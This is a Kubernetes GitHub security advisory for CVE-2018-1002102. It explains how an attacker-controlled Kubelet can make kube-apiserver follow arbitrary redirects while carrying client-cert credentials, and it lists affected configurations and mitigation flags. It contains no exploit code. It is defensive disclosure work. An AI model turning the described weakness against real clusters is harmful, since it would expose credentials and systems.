Skip to content

CVE-2018-1002102: Unvalidated redirect #85867

New issue
New issue
Closed
Closed
CVE-2018-1002102: Unvalidated redirect#85867
Labels
area/apiserverarea/securitycommittee/security-responseDenotes an issue or PR intended to be handled by the product security committee.kind/bugCategorizes issue or PR as related to a bug.official-cve-feedIssues or PRs related to CVEs officially announced by Security Response Committee (SRC)sig/api-machineryCategorizes an issue or PR as relevant to SIG API Machinery.sig/nodeCategorizes an issue or PR as relevant to SIG Node.
@tallclair

Description

@tallclair
tallclair
opened on Dec 3, 2019

CVSS Rating: CVSS:3.0/AV:N/AC:H/PR:H/UI:R/S:C/C:L/I:N/A:N/E:F (Low)

An attacker-controlled Kubelet can return an arbitrary redirect when responding to certain apiserver requests. Impacted kube-apiservers will follow the redirect as a GET request with client-cert credentials for authenticating to the Kubelet.

Am I vulnerable?

Kubernetes API servers with the StreamingProxyRedirects feature enabled AND without the ValidateProxyRedirects feature are affected.

API servers using SSH tunnels (--ssh-user / --ssh-keyfile) are not affected.

Using the default feature gate values, kube-apiserver versions before v1.14 are affected.

How do I mitigate this vulnerability?

For Kubernetes versions >= v1.10.0, the ValidateProxyRedirects can be manually enabled with the kube-apiserver flag --feature-gates=ValidateProxyRedirects=true.

Fix impact

The ValidateProxyRedirects feature will cause the kube-apiserver to check that redirects go to the same host. If nodes are configured to respond to CRI streaming requests on a different host interface than what the apiserver makes requests on (only the case if not using the built-in dockershim & setting the kubelet flag --redirect-container-streaming=true), then these requests will be broken. In that case, the feature can be temporarily disabled until the node configuration is corrected. We suggest setting --redirect-container-streaming=false on the kubelet to avoid issues.

Fixed Versions

Additional Details

In a future release, we plan to deprecate the StreamingProxyRedirects feature, instead opting to handle the redirection locally through the Kubelet. Once the deprecation is complete, we can completely remove apiserver redirect handling (at least for Kubelet requests).

Acknowledgements

This vulnerability was reported by Alban Crequy.

/area security
/kind bug
/committee product-security
/sig api-machinery node
/area apiserver

/close

Metadata

Metadata

Assignees

No one assigned

    Labels

    area/apiserverarea/securitycommittee/security-responseDenotes an issue or PR intended to be handled by the product security committee.kind/bugCategorizes issue or PR as related to a bug.official-cve-feedIssues or PRs related to CVEs officially announced by Security Response Committee (SRC)sig/api-machineryCategorizes an issue or PR as relevant to SIG API Machinery.sig/nodeCategorizes an issue or PR as relevant to SIG Node.

    Type

    No type

    Projects

    No projects

    Milestone

    No milestone

    Relationships

    None yet

    Development

    No branches or pull requests

    Issue actions